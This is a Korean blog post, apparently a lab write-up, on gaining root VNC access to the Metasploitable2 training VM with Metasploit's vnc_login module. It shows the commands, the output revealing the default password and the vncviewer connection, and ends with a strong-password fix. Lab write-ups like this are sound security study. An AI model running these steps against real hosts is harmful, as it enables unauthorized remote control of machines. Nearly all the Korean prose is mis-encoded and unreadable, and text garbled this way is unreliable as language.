- ๋ฆฌ๋ ์ค ์ทจ์ฝ์ ์ง๋จ ์ค์ต metasploitable2 - VNC(5900)2024๋ 05์ 16์ผ 14์ 25๋ถ 35์ด์ ์ ๋ก๋ ๋ ๊ธ์ ๋๋ค.์์ฑ์: ๋ฐฉ์ธ์ฐ
๐ณ๏ธ
metasploitable2 ์ทจ์ฝ์ - VNC (5900)
๋ณธ ๊ฒ์๊ธ์ ์ค์ต์ ํด๋น ์ฌ์ดํธ๋ฅผ ์ฐธ๊ณ ํ์๋ค.
https://github.com/Milkad0/Metasploitable-2
์ทจ์ฝ์ ์ ๋ํ ์ถ๊ฐ์ ์ธ ์กฐ์ฌ :
https://www.rapid7.com/db/modules/auxiliary/scanner/vnc/vnc_login/
์ค์ต ๋ชฉ์ .
metasploitable2 ๊ฐ์๋จธ์ ์ ์ค์บ๋์ ํตํด VNC ์ทจ์ฝ์ ์ ์์๋ด๊ณ , ์ด๋ฅผ exploit ํด๋ณธ๋ค.ํ๊ฒฝ์ค์ .
๊ณต๊ฒฉ์ : kali linux
ํผํด์ : metasploitable2 (192.168.132.131)ํฌํธ ์ค์บ๋
ํฌํธ ์ค์บ๋์ ํตํด VNC (protocol 3.3)์ ์ด๋ ค์๋ 5900 ํฌํธ๋ฅผ ํ์ธํ์๋ค.
์์ธ ์ค์บ๋ ๋ฐ Exploit
kali linux๋ฅผ ํตํด metasploit framework๋ฅผ ์คํํด์ฃผ์ด ํฐ๋ฏธ๋ ์ฐฝ์ ์์ฑํ๋ค.
search vnc๋ฅผ ํตํด vnc์ ๊ดํ ์ ๋ณด๋ฅผ ์ฐพ์ ์ ์์๋๋ฐ,
์ด ์ค auxiliary/scanner/vnc/vnc_login์ ํ์ธํ๋ค.
search vnc
use auxiliary/scanner/vnc/vnc_login
์ด์ use ๋ช ๋ น์ด๋ฅผ ํตํด auxiliary/scanner/vnc/vnc_login ๋ชจ๋์ ์ฅ์ฐฉํด์ค๋ค.
set rhosts 192.168.132.131
rhosts์ ์ฌ์ฉ์์ ip ์ฃผ์๋ฅผ ์ ์ฉํด์ฃผ์๋ค.
๊ทธ๋ฆฌ๊ณ ๊ณต๊ฒฉ์ ์๋ํ๋ค.
exploit
exploit์ ์ฑ๊ณตํ๋ฉด ํด๋น ๋ด์ฉ์ ํ์ธํ ์ ์๋ค.
[+] 192.168.132.131 : 5900 - 192.168.132.131 : 5900 - Login Successful: :password ๋ก๊ทธ์ธ์ด ์ ์์ ์ผ๋ก ์ํ๋ ๊ฒ์ ํ์ธํ ์ ์๋ค.
vncviewer 192.168.132.131
์ด์ metasploit framework๋ฅผ exitํด ๋น ์ ธ๋์์ฃผ๊ณ ,
vncviewer rhost ์ ๋ ฅ์ ํตํด vncviewer์ ์ ๊ทผํ๋ค.
์ดํ ๋น๋ฐ๋ฒํธ๋ก password ๋ฅผ ์ ๋ ฅํด์ค๋ค.
exploit์ ํตํด ์ทจ๋ํ password๋ฅผ ์ฌ๋ฐ๋ฅด๊ฒ ์ ๋ ฅํ๋ฉด ๊ทธ๋ํฝ ์ธํฐํ์ด์ค ์ฐฝ์ ์ป๋๋ค.
์ค์ต ๊ฒฐ๊ณผ
VNCํฌํธ์ root์ ์ ์์ ์ผ๋ก ๋ก๊ทธ์ธ๋ ๊ฒ์ด ํ์ธ๋์๋ค.
whoami ๋ช ๋ น์ด๋ฅผ ์ ๋ ฅํ์ ๋ root(๊ด๋ฆฌ์)๋ก ์ ์๋์์์ ํ์ธํ์๋ค.
ํด๋น ์ทจ์ฝ์ ์ด ๋ฐ์ํ ์ด์ ๋ ์ทจ์ฝํ ๋น๋ฐ๋ฒํธ ๋๋ฌธ์ด๋ค.
์ด๋ฅผ ๋ฐฉ์งํ๊ธฐ ์ํ์ฌ ๋น๋ฐ๋ฒํธ๋ฅผ ๋์ฑ ๊ฐ๋ ฅํ ๋น๋ฐ๋ฒํธ๋ก ๋ณ๊ฒฝํด์ผ ํ๋ค.
๋ค์๊ธ์ด ์์ต๋๋ค.์ด์ ๊ธ์ด ์์ต๋๋ค.๋๊ธ